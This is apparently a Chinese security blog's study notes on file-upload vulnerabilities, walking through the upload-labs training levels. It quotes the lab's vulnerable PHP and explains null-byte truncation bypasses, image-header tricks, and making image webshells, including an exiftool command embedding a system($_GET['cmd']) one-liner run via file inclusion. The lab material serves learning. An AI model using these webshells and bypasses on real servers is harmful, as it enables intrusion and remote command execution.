<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  
  <title>文件上传漏洞 学习笔记(二) | qwzf</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  
    <meta name="keywords" content="qwzf,Qwzf's Blog">
  
  <meta name="description" content="前言之前已经总结了一部分文件上传漏洞，现在继续总结剩余的另一部分。 正文漏洞环境依旧用的upload-labs。 四、白名单限制文件上传文件截断绕过%00截断类型：PHP %00截断原理：因为00代表结束符，所以会把00后面的所有字符删除条件：PHP版本小于5.3.4，PHP的magic_quotes_gpc为OFF状态常见的截断上传0x00，%00，/00 截断的核心在于chr(0)这个字符，这">
<meta name="keywords" content="BUG,文件上传漏洞">
<meta property="og:type" content="article">
<meta property="og:title" content="文件上传漏洞 学习笔记(二)">
<meta property="og:url" content="https://qwzf.github.io/2019/08/03/文件上传漏洞 学习笔记(二)/index.html">
<meta property="og:site_name" content="qwzf">
<meta property="og:description" content="前言之前已经总结了一部分文件上传漏洞，现在继续总结剩余的另一部分。 正文漏洞环境依旧用的upload-labs。 四、白名单限制文件上传文件截断绕过%00截断类型：PHP %00截断原理：因为00代表结束符，所以会把00后面的所有字符删除条件：PHP版本小于5.3.4，PHP的magic_quotes_gpc为OFF状态常见的截断上传0x00，%00，/00 截断的核心在于chr(0)这个字符，这">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20190802191846441.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20190802195848452.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20190802200104862.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20190802200317402.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20190802214401972.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20190802214433325.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20190802214500986.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20190802214708404.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20190802214816604.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/2019080222180554.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20190802225041930.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20190802225902623.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/2019080223054322.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20191015233746644.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20191016003451310.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20191016003505204.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20190802233659378.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20190802233847670.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20190802234603734.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20190802235710965.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20190803012725846.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20190803014926329.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20190803015051544.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20190803015147765.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://img-blog.csdnimg.cn/20190803015511590.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
<meta property="og:updated_time" content="2019-10-18T17:03:44.742Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="文件上传漏洞 学习笔记(二)">
<meta name="twitter:description" content="前言之前已经总结了一部分文件上传漏洞，现在继续总结剩余的另一部分。 正文漏洞环境依旧用的upload-labs。 四、白名单限制文件上传文件截断绕过%00截断类型：PHP %00截断原理：因为00代表结束符，所以会把00后面的所有字符删除条件：PHP版本小于5.3.4，PHP的magic_quotes_gpc为OFF状态常见的截断上传0x00，%00，/00 截断的核心在于chr(0)这个字符，这">
<meta name="twitter:image" content="http://img-blog.csdnimg.cn/20190802191846441.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70">
  
  
    <link rel="icon" href="/favicon.ico">
  
  <link href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">
  <link rel="stylesheet" href="/css/style.css">
  <script src="/js/pace.min.js"></script>
  

  
  

</head>
</html>
<script src="https://g.joyinshare.com/hc/ribbon.min.js" type="text/javascript"></script>
<canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas> 
<script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
<script type="text/javascript" src="/js/fireworks.js"></script>
<body>
  <div id="container">
      <header id="header">
    <div id="banner"></div>
    <div id="header-outer">
        <div id="header-menu" class="header-menu-pos animated">
            <div class="header-menu-container">
                <a href="/" class="left">
                    <span class="site-title">Qwzf&#39;s Blog</span>
                </a>
                <nav id="header-menu-nav" class="right">
                    
                    <a href="/">
                        <i class="fa fa-home"></i>
                        <span>Home</span>
                    </a>
                    
                    <a target="_blank" href="/archives">
                        <i class="fa fa-archive"></i>
                        <span>Archives</span>
                    </a>
                    
                    <a href="/about">
                        <i class="fa fa-user"></i>
                        <span>About</span>
                    </a>
                    
                </nav>
                <a class="mobile-header-menu-button">
                    <i class="fa fa-bars"></i>
                </a>
            </div>
        </div>
        <div id="header-row">
            <div id="logo">
                <a href="/">
                    <img src="/images/logo.png" alt="logo">
                </a>
            </div>
            <div class="header-info">
                <div id="header-title">
                    
                    <h2>
                        Qwzf&#39;s Blog
                    </h2>
                    
                </div>
                <div id="header-description">
                    
                    <h3>
                        一个爱学习的小白
                    </h3>
                    
                </div>
            </div>
            <nav class="header-nav">
                <div class="social">
                    
                        <a title="qwzf" target="_blank" href="//qwzf.github.io">
                            <i class="fa fa-home fa-2x"></i></a>
                    
                        <a title="Github" target="_blank" href="//github.com/">
                            <i class="fa fa-github fa-2x"></i></a>
                    
                        <a title="Weibo" target="_blank" href="//weibo.com/">
                            <i class="fa fa-weibo fa-2x"></i></a>
                    
                        <a title="Twitter" target="_blank" href="//twitter.com/">
                            <i class="fa fa-twitter fa-2x"></i></a>
                    
                </div>
            </nav>
        </div>
    </div>
</header>
      <div class="outer">
        <section id="main" class="body-wrap"><article id="post-文件上传漏洞 学习笔记(二)" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-inner">
    
      <header class="article-header">
        
  
    <h1 class="post-title" itemprop="name">
      文件上传漏洞 学习笔记(二)
    </h1>
    <div class="post-title-bar">
      <ul>
          
              <li>
                  <i class="fa fa-book"></i>
                  
                      <a href="/categories/Web/">Web</a>
                  
              </li>
          
        <li>
          <i class="fa fa-calendar"></i>  2019-08-03
        </li>
        <li>
          <i class="fa fa-eye"></i>
          <span id="busuanzi_value_page_pv"></span>
        </li>
      </ul>
    </div>
  

          
      </header>
    
    <div class="article-entry post-content" itemprop="articleBody">
      
            
            <h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>之前已经总结了一部分文件上传漏洞，现在继续总结剩余的另一部分。</p>
<h3 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h3><p>漏洞环境依旧用的upload-labs。</p>
<h4 id="四、白名单限制文件上传"><a href="#四、白名单限制文件上传" class="headerlink" title="四、白名单限制文件上传"></a>四、白名单限制文件上传</h4><h5 id="文件截断绕过"><a href="#文件截断绕过" class="headerlink" title="文件截断绕过"></a>文件截断绕过</h5><p><strong>%00截断</strong><br>类型：PHP %00截断<br>原理：因为<code>00</code>代表结束符，所以会把00后面的所有字符删除<br>条件：PHP版本小于5.3.4，PHP的magic_quotes_gpc为OFF状态<br><strong>常见的截断上传</strong><br>0x00，%00，/00 截断的核心在于chr(0)这个字符，这个函数表示返回以数值表达式值为编码的字符。char(0)表示的ascll字符是null，当程序输出包含chr(0)变量时，chr(0)后面的数据会被截断，后面的数据直接忽略，导致漏洞产生。</p>
<h5 id="Pass-11"><a href="#Pass-11" class="headerlink" title="Pass-11"></a>Pass-11</h5><p>查看源码<br><figure class="highlight php"><table><tr><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>]))&#123;</span><br><span class="line">    $ext_arr = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line">    $file_ext = substr($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],strrpos($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line">    <span class="keyword">if</span>(in_array($file_ext,$ext_arr))&#123;</span><br><span class="line">        $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line">        $img_path = $_GET[<span class="string">'save_path'</span>].<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_ext;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(move_uploaded_file($temp_file,$img_path))&#123;</span><br><span class="line">            $is_upload = <span class="keyword">true</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            $msg = <span class="string">'上传出错！'</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span>&#123;</span><br><span class="line">        $msg = <span class="string">"只允许上传.jpg|.png|.gif类型文件！"</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>是白名单判断，但$img_path直接拼接，所以可以利用%00截断绕过，上传webshell。<br>因为我的ubantu虚拟机PHP版本大于5.3.4，所以直接在windows进行测试。<br>因为之前没用过，所以先配置一下：<br>1、<a href="http://www.cnblogs.com/slpawn/p/7235105.html" target="_blank" rel="noopener">Firefox+Burpsuite抓包配置</a><br>2、设置PHP版本<br><img src="http://img-blog.csdnimg.cn/20190802191846441.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>3、magic_quotes_gpc调为OFF：<a href="http://www.hadsky.com/read-1320-1.html" target="_blank" rel="noopener">magic_quotes_gpc函数的关闭方法</a></p>
<p>配置结束，开始上传webshell.jpg，抓包，添加webshell.php%00<br><img src="http://img-blog.csdnimg.cn/20190802195848452.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>Forward发包，上传成功<br><img src="http://img-blog.csdnimg.cn/20190802200104862.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>测试连接，连接成功<br><img src="http://img-blog.csdnimg.cn/20190802200317402.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<h5 id="Pass-12"><a href="#Pass-12" class="headerlink" title="Pass-12"></a>Pass-12</h5><p>查看源码，还是白名单判断，还是利用00截断。但save_path是通过post传进来的，post不会像get对%00进行自动解码，所以需要在二进制中进行修改。<br><img src="http://img-blog.csdnimg.cn/20190802214401972.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br><img src="http://img-blog.csdnimg.cn/20190802214433325.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>空格的十六进制是20 ，将0x20 改成0x00 也就是00<br><img src="http://img-blog.csdnimg.cn/20190802214500986.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>点击Go，上传成功<br><img src="http://img-blog.csdnimg.cn/20190802214708404.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>测试连接，连接成功<br><img src="http://img-blog.csdnimg.cn/20190802214816604.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<h4 id="五、内容限制文件上传"><a href="#五、内容限制文件上传" class="headerlink" title="五、内容限制文件上传"></a>五、内容限制文件上传</h4><h5 id="Pass-13"><a href="#Pass-13" class="headerlink" title="Pass-13"></a>Pass-13</h5><p><img src="http://img-blog.csdnimg.cn/2019080222180554.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>要求上传图片马，查看源码<br><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getReailFileType</span><span class="params">($filename)</span></span>&#123;</span><br><span class="line">    $file = fopen($filename, <span class="string">"rb"</span>);</span><br><span class="line">    $bin = fread($file, <span class="number">2</span>); <span class="comment">//只读2字节</span></span><br><span class="line">    fclose($file);</span><br><span class="line">    $strInfo = @unpack(<span class="string">"C2chars"</span>, $bin);    </span><br><span class="line">    $typeCode = intval($strInfo[<span class="string">'chars1'</span>].$strInfo[<span class="string">'chars2'</span>]);    </span><br><span class="line">    $fileType = <span class="string">''</span>;    </span><br><span class="line">    <span class="keyword">switch</span>($typeCode)&#123;      </span><br><span class="line">        <span class="keyword">case</span> <span class="number">255216</span>:            </span><br><span class="line">            $fileType = <span class="string">'jpg'</span>;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">case</span> <span class="number">13780</span>:            </span><br><span class="line">            $fileType = <span class="string">'png'</span>;</span><br><span class="line">            <span class="keyword">break</span>;        </span><br><span class="line">        <span class="keyword">case</span> <span class="number">7173</span>:            </span><br><span class="line">            $fileType = <span class="string">'gif'</span>;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">default</span>:            </span><br><span class="line">            $fileType = <span class="string">'unknown'</span>;</span><br><span class="line">        &#125;    </span><br><span class="line">        <span class="keyword">return</span> $fileType;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>]))&#123;</span><br><span class="line">    $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line">    $file_type = getReailFileType($temp_file);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>($file_type == <span class="string">'unknown'</span>)&#123;</span><br><span class="line">        $msg = <span class="string">"文件未知，上传失败！"</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        $img_path = UPLOAD_PATH.<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_type;</span><br><span class="line">        <span class="keyword">if</span>(move_uploaded_file($temp_file,$img_path))&#123;</span><br><span class="line">            $is_upload = <span class="keyword">true</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            $msg = <span class="string">"上传出错！"</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>分析代码，通过读文件的前2个字节判断文件类型，因此直接上传图片马即可，</p>
<h5 id="图片马制作方法"><a href="#图片马制作方法" class="headerlink" title="图片马制作方法"></a>图片马制作方法</h5><p>方法一：<code>copy normal.jpg /b + shell.php /a webshell.jpg</code><br>这里，b代表二进制，a代表ascii编码<br>方法二：<code>exiftool -Comment=&#39;&lt;?php echo &quot;&lt;pre&gt;&quot;; system($_GET[&#39;cmd&#39;]); ?&gt;&#39; 1.jpg</code></p>
<p>我采用方法一先制作个图片马webshell.jpg(为了方便以后关卡一般直尝试jpg图片马)<br><img src="http://img-blog.csdnimg.cn/20190802225041930.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>上传<code>webshell.jpg</code>，不用抓包改包，上传成功<br><img src="http://img-blog.csdnimg.cn/20190802225902623.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>测试连接，连接失败，发现文件名被替换。一般使用BurpSuite的Repeater进行发包上传，方便查看被修改后的文件名。这里我用的本地搭建的环境，直接查看就行了。<br><img src="http://img-blog.csdnimg.cn/2019080223054322.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>重新输入图片马的文件名，测试连接，连接成功。表示该图片上传成功，但并不意味者可以进行利用<br><img src="http://img-blog.csdnimg.cn/20191015233746644.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>利用的话，还需要结合文件包含漏洞。这个靶场环境自带了个文件包含文件内容如下：</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">本页面存在文件包含漏洞，用于测试图片马是否能正常运行！</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">header(<span class="string">"Content-Type:text/html;charset=utf-8"</span>);</span><br><span class="line">$file = $_GET[<span class="string">'file'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($file))&#123;</span><br><span class="line">    <span class="keyword">include</span> $file;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    show_source(<span class="keyword">__file__</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>在php中，使用include,require、include_once、require_once函数包含的文件，会被当做php代码执行。无论文件的名称是什么，只要文件内容符合PHP代码规范，都会被当作PHP代码执行。<br><img src="http://img-blog.csdnimg.cn/20191016003451310.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt><br>列出目录<br><img src="http://img-blog.csdnimg.cn/20191016003505204.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt></p>
<h5 id="Pass-14"><a href="#Pass-14" class="headerlink" title="Pass-14"></a>Pass-14</h5><p>依旧是上传图片马，查看源码<br><figure class="highlight"><table><tr><td class="code"><pre><span class="line">function isImage($filename)&#123;</span><br><span class="line">    $types = '.jpeg|.png|.gif';</span><br><span class="line">    if(file_exists($filename))&#123;</span><br><span class="line">        $info = getimagesize($filename);</span><br><span class="line">        $ext = image_type_to_extension($info[2]);</span><br><span class="line">        if(stripos($types,$ext)&gt;=0)&#123;</span><br><span class="line">            return $ext;</span><br><span class="line">        &#125;else&#123;</span><br><span class="line">            return false;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;else&#123;</span><br><span class="line">        return false;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>这里用的是<code>getimagesize</code>获取文件类型，还是直接可以利用图片马就可以绕过。<br>还用Pass-13制作的那个图片马，上传成功，连接成功。利用的话，结合文件包含漏洞。</p>
<p>当然查看有关信息发现可以图片头绕过，具体操作如下：<br>将PHP木马文件，改成<code>*.php;.jpg</code><br>抓包，给文件头部加上：GIF89a 图片头标识</p>
<h5 id="Pass-15"><a href="#Pass-15" class="headerlink" title="Pass-15"></a>Pass-15</h5><p>查看源码<br><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">isImage</span><span class="params">($filename)</span></span>&#123;</span><br><span class="line">    <span class="comment">//需要开启php_exif模块</span></span><br><span class="line">    $image_type = exif_imagetype($filename);</span><br><span class="line">    <span class="keyword">switch</span> ($image_type) &#123;</span><br><span class="line">        <span class="keyword">case</span> IMAGETYPE_GIF:</span><br><span class="line">            <span class="keyword">return</span> <span class="string">"gif"</span>;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">case</span> IMAGETYPE_JPEG:</span><br><span class="line">            <span class="keyword">return</span> <span class="string">"jpg"</span>;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">case</span> IMAGETYPE_PNG:</span><br><span class="line">            <span class="keyword">return</span> <span class="string">"png"</span>;</span><br><span class="line">            <span class="keyword">break</span>;    </span><br><span class="line">        <span class="keyword">default</span>:</span><br><span class="line">            <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>利用php_exif模块判断文件类型，还是直接利用图片马就可以绕过。<br>上传图片马，在windows上上传有问题。所以打开ubantu漏洞环境上传，上传成功<br><img src="http://img-blog.csdnimg.cn/20190802233659378.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>查看文件名<br><img src="http://img-blog.csdnimg.cn/20190802233847670.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>测试连接，连接成功。利用的话，结合文件包含漏洞。</p>
